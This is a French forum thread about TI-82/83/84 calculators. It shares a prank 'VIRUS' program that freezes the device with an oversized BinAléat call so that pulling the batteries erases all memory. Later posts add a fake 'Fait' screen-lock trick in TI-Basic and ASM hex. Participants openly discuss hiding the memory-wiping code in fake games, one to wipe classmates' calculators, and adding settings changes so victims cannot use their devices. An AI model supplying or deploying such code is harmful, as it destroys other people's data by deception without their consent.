Gamme TI-82
Partager sur Facebook Fil RSS Imprimer la page
Cacher les résultats

Résultat de la recherche



Poster un nouveau sujet Poster une réponse
VIRUS
Auteur Message
alexvire
Avatar

Autorisation : Membre
Nb de messages : 241
Inscrit le : Dim 10 Mai 2009, 13:31
Posté le : Mer 12 Mai 2010, 20:49   Citer 

VIRUS



• Taille: 102 octets

• Vous ne supportez plus vos camarades, ce programme est fait pour vous. En effet, celui-ci oblige l'utilisateur à enlever ces piles pour voir s'effacer la mémoire de sa TI.

• Fonctionne sur:
- TI-82 Stats(.fr)
- TI-83
- TI-83+(.fr)
- TI-84+

• Télécharger:
- 83p
- 8xp

• Taper à la main: (Français)

Code
EffEcr
Disp "     VIRUS","","  ENLEVEZ PUIS","  REMETTEZ LES","  PILES ET...","   SURPRISE !
BinAléat({E}99,0



• Taper à la main: (Anglais)

Code
ClrHome
Disp "     VIRUS","","  ENLEVEZ PUIS","  REMETTEZ LES","  PILES ET...","   SURPRISE !
randBin({E}99,0



• Caractères spéciaux:
{E} = [2nde] + [,]

----------------------
Salut, visitez mon site:

Et mon forum !

Mes programmes.
Convertissez vos images en un programme à mettre sur votre TI.
 Adresse email Haut de page Bas de page 
 
-Coco-



Autorisation : Membre
Nb de messages : 149
Inscrit le : Sam 28 Nov 2009, 16:09
Posté le : Sam 15 Mai 2010, 10:23   Citer 

Heuu ^^

 Adresse email Haut de page Bas de page 
 
Rézus
Avatar

Autorisation : Membre
Nb de messages : 861
Inscrit le : Sam 20 Jui 2009, 20:35
Posté le : Sam 15 Mai 2010, 18:46   Citer 

Moi je trouves que ça peut aussi très bien se combiner avec mon programme de copyright ^^

 Adresse email Haut de page Bas de page 
 
Persalteas



Autorisation : Membre
Nb de messages : 2176
Inscrit le : Sam 23 Jan 2010, 20:09
Posté le : Lun 17 Mai 2010, 19:47   Citer 

super!!
j'en avais fait un qui changeait tous les paramêtres possibles et immaginables.
pourquoi ne pas combiner les deux?

j'aime bien les sadiques dans ton genre, mais ce prog ne se répandra pas beaucoup si on doit le supprimmer!

 Adresse email Haut de page Bas de page 
 
invité
Invité
Posté le : Mer 19 Mai 2010, 21:43   Citer 

Ça s'efface vraiment ? Parce que j'aimerais tester si ça marche, mais si ça marche ben j'ai tout d'effacé, comme il me semble assez simple pour pouvoir effacer, mais je m'y connais pas.
Sinon, bon j'ai déjà fais seul des petits programmes pour dériver ; suites très basiques ; diviseurs naturels ; mais ils sont très lourds (je passe par un menu personnalisé), mais là j'aimerais savoir à quoi sert : BinAléat({E}99,0

Merci bien.

  Haut de page Bas de page 
 
linkakro



Autorisation : Membre
Nb de messages : 3774
Inscrit le : Lun 19 Oct 2009, 21:25
Posté le : Mer 19 Mai 2010, 22:33   Citer 

Binaléat génère aléatoirement des séries de résultats possibles dans des situation du style pile ou face, selon le nombre de lancers etc.

Et il se trouve que la calculatrice bloque lorsque les valeurs du binaléat sont trop importantes, obligeant à enlever les piles car le calcul ne finit jamais ou presque et bloquant la touche ON ! (E99 étant proche du nombre le plus grand de la calculatrice)

----------------------
ti82statfr: 2008, inscrit: 2009, ti84pocketfr: noël2011, ti30xbmultiview: iut 2012-2014
Perfectionniste, manque tact. Pas le temps de tout publier depuis 2011. Répond toujours aux questions. (rédigé juin 2014)

Pour tout le monde et surtout les débutants, quelques-uns des articles courants :
*Traductions Algorithmie/Ti-Basic.
*Caractères spéciaux sur Tout82
Les défauts du TI-Basic : Goto_versus_algo et DelVar/End/Lbl/guillemet/store
 Adresse email Haut de page Bas de page 
 
Invité
Invité
Posté le : Jeu 20 Mai 2010, 11:34   Citer 

D'accord, merci, mais ça oblige donc à enlever les piles type AAA, or les données ne sont effacées que lorsqu'on enlève la pile plate il me semble, en tout cas, merci énormément pour cette réponse et l'explication du binaléat.

  Haut de page Bas de page 
 
Ryuu



Autorisation : Membre
Nb de messages : 58
Inscrit le : Mer 07 Oct 2009, 20:44
Posté le : Jeu 20 Mai 2010, 16:38   Citer 

Je confirme que ce programme marche à 100%.
Ne tenant plus, je l'ai essayé pour voir si ça marchait vraiment ou si c'était un fake, pensant également qu'en enlevant les piles AAA, ça n'effacerait rien. Résultat? Calculatrice toute clean et tous le programmes à refaire.
nt
Voulant me venger des petits comiques de ma classe qui suppriment des programmes ou des lignes de code au hasard, j'ai instauré ce programme dans un faux jeu (*rire sadique*).

 Adresse email Haut de page Bas de page 
 
Invité
Invité
Posté le : Jeu 20 Mai 2010, 16:59   Citer 

Ah ? Parce que une fois, ma calculatrice était déchargée, j'ai donc changé les piles (pas la plate) et rien n'était effacé.
Par contre, j'ai essayé binaleat(1,0) et ça mettait tout le temps 0.

  Haut de page Bas de page 
 
Google_AdSense



Publicité    



 
alexvire
Avatar

Autorisation : Membre
Nb de messages : 241
Inscrit le : Dim 10 Mai 2009, 13:31
Posté le : Jeu 20 Mai 2010, 17:16   Citer 

C'est normal car la calculatrice efface la mémoire seulement quand tu enlèves les piles pendant qu'elle exécute un calcul. Si elle était éteinte pendant que tu as enlevé les piles tu ne risque rien.

Si vous voulez faire ce "bug" sur une calculatrice sans le programme. (A un copain par exemple vous n'avez juste qu'à mettre BinAléat({E}99,0.

----------------------
Salut, visitez mon site:

Et mon forum !

Mes programmes.
Convertissez vos images en un programme à mettre sur votre TI.
 Adresse email Haut de page Bas de page 
 
linkakro



Autorisation : Membre
Nb de messages : 3774
Inscrit le : Lun 19 Oct 2009, 21:25
Posté le : Jeu 20 Mai 2010, 18:33   Citer 


Citer : Invité

Par contre, j'ai essayé binaleat(1,0) et ça mettait tout le temps 0.


En effet car le deuxième nombre (qui doit valoir entre 0 et 1) est la probabilité de résultat à 1. Donc une probabilité à 0 signifie résultat toujours nul.

----------------------
ti82statfr: 2008, inscrit: 2009, ti84pocketfr: noël2011, ti30xbmultiview: iut 2012-2014
Perfectionniste, manque tact. Pas le temps de tout publier depuis 2011. Répond toujours aux questions. (rédigé juin 2014)

Pour tout le monde et surtout les débutants, quelques-uns des articles courants :
*Traductions Algorithmie/Ti-Basic.
*Caractères spéciaux sur Tout82
Les défauts du TI-Basic : Goto_versus_algo et DelVar/End/Lbl/guillemet/store
 Adresse email Haut de page Bas de page 
 
Invité
Invité
Posté le : Jeu 20 Mai 2010, 19:43   Citer 

Ah, merci beaucoup, car quand je mettais 1 au lieu de 0, j'avais tout le temps le chiffre de gauche.
Merci aussi pour l'explication des piles qu'il ne fallait pas enlever en plein calcul.

  Haut de page Bas de page 
 
Persalteas



Autorisation : Membre
Nb de messages : 2176
Inscrit le : Sam 23 Jan 2010, 20:09
Posté le : Lun 24 Mai 2010, 20:58   Citer 

j'avoue qu'il y a de l'idée... essayez donc en changeant les paramêtres de mode, de fenêtre, de table, de zoom, de graphe, avant d'écrire Binaléat comme ça en plus de la mémoire effacée, la calculette n'est plus du tout utilisable pour qqn qui ne s'y connait pas...


mais rearque le Bin aléat c'est une bonne idée, c'est indétectable dans un prog.
ça peut servir de sécurité pour pas qu'on te pique des progs.

encore une fois, j'adore.

 Adresse email Haut de page Bas de page 
 
Persalteas



Autorisation : Membre
Nb de messages : 2176
Inscrit le : Sam 23 Jan 2010, 20:09
Posté le : Mar 08 Jui 2010, 11:25   Citer 

voilà une nouvelle idée...
ça ne formate pas, mais ça fait croire que le programme est fini et on se demande pourquoi la calcilette ne marche plus.
j'ai essayé avec des potes, effet garanti!

à la fin (ou en cours d'un prog, ajoutez:


Code

:While 1
:Output(1,16," ")
:Output(2,13,"Fait"
:End





le f se fait avec [alpha] [cos]
le a avec [var][5][>][>][2]
le i avec [2nde][.]
le t avec [var][5][<][<][3]

dites moi ce que vous en pensez!!

 Adresse email Haut de page Bas de page 
 
Rézus
Avatar

Autorisation : Membre
Nb de messages : 861
Inscrit le : Sam 20 Jui 2009, 20:35
Posté le : Mar 08 Jui 2010, 15:30   Citer 

Mdr,bien vu ^^ je savais pas qu'on pouvait faire ces lettres.

 Adresse email Haut de page Bas de page 
 
alexvire
Avatar

Autorisation : Membre
Nb de messages : 241
Inscrit le : Dim 10 Mai 2009, 13:31
Posté le : Mar 08 Jui 2010, 17:00   Citer 

Exellent, par contre dommage que l'on ne puisse pas utiliser le même "i".
Je vais essayer de l'adapter en ASM pour afficher le même "i".

----------------------
Salut, visitez mon site:

Et mon forum !

Mes programmes.
Convertissez vos images en un programme à mettre sur votre TI.
 Adresse email Haut de page Bas de page 
 
alexvire
Avatar

Autorisation : Membre
Nb de messages : 241
Inscrit le : Dim 10 Mai 2009, 13:31
Posté le : Mar 08 Jui 2010, 17:15   Citer 

Voilà, j'ai adapté ton programme en ASM, voici les programmes:

FAIT:

Code
Envoi(9prgmZFAIT
While 1
End



ZFAIT: (Ne faites pas d'erreurs !)

Code
CD9547CD554721000C220C80213A93CD0D47C94661697400
End
0000
End



Et pour ceux qui veulent voici la source ASM:

Citer
.NOLIST

#define equ .equ

#define EQU .equ

#define end .end

#include "ti83asm.inc"

#include "tokens.inc"

.LIST

.org 9327h

call _runindicoff ; Enlève l'indicateur en haut à droite.
call _clrlcdfull ; Efface l'écran.

ld hl,0C00h ; Position du "Output(" moins un en héxadécimal.

ld (CURROW),hl

ld hl,Str

call _puts ; Afficher le texte.

ret ; Retour au mode normal.

Str:
.db "Fait",0 ; Message à afficher.

.end



----------------------
Salut, visitez mon site:

Et mon forum !

Mes programmes.
Convertissez vos images en un programme à mettre sur votre TI.
 Adresse email Haut de page Bas de page 
 
Persalteas



Autorisation : Membre
Nb de messages : 2176
Inscrit le : Sam 23 Jan 2010, 20:09
Posté le : Mar 08 Jui 2010, 21:50   Citer 

yeah!!! glasses.gif glasses.gif

 Adresse email Haut de page Bas de page 
 
alexvire
Avatar

Autorisation : Membre
Nb de messages : 241
Inscrit le : Dim 10 Mai 2009, 13:31
Posté le : Sam 12 Jui 2010, 17:11   Citer 

En faite je viens de remarquer qu'il y a une fonction ASM pour afficher directement le message, donc voici le nouveau code qui est beaucoup plus trompeur à l'aide de ZNOLOAD:

FAIT:

Code
EffEcr
Envoi(9prgmZFAIT
Envoi(9prgmZNOLOAD
Repeat codeTouche=45
End
EffEcr
Output(4,6,"ALEXIS
Output(1,1,"



ZFAIT:

Code
CDF147C9
End
0000
End



ZNOLOAD:

Code
CD9547C9
End
0000
End



Pour quitter appuyez sur [annul].

----------------------
Salut, visitez mon site:

Et mon forum !

Mes programmes.
Convertissez vos images en un programme à mettre sur votre TI.
 Adresse email Haut de page Bas de page 
 
Google_AdSense



Publicité    



 
Poster un nouveau sujet Poster une réponse





  Powered by Fire-Soft-Board v1.0.10 © 2004 - 2016 Groupe FSB
Page générée en 9 requêtes
BlackOne par Grimmlink
 

Site hébergé par Free Page sous licence creative commons Page validée par le W3C (XHTML 1.0 Transitional) Feuille de style validée par le W3C Flux RSS 2.0 valide Page étiquetée par l'ICRA Page testée par Ocawa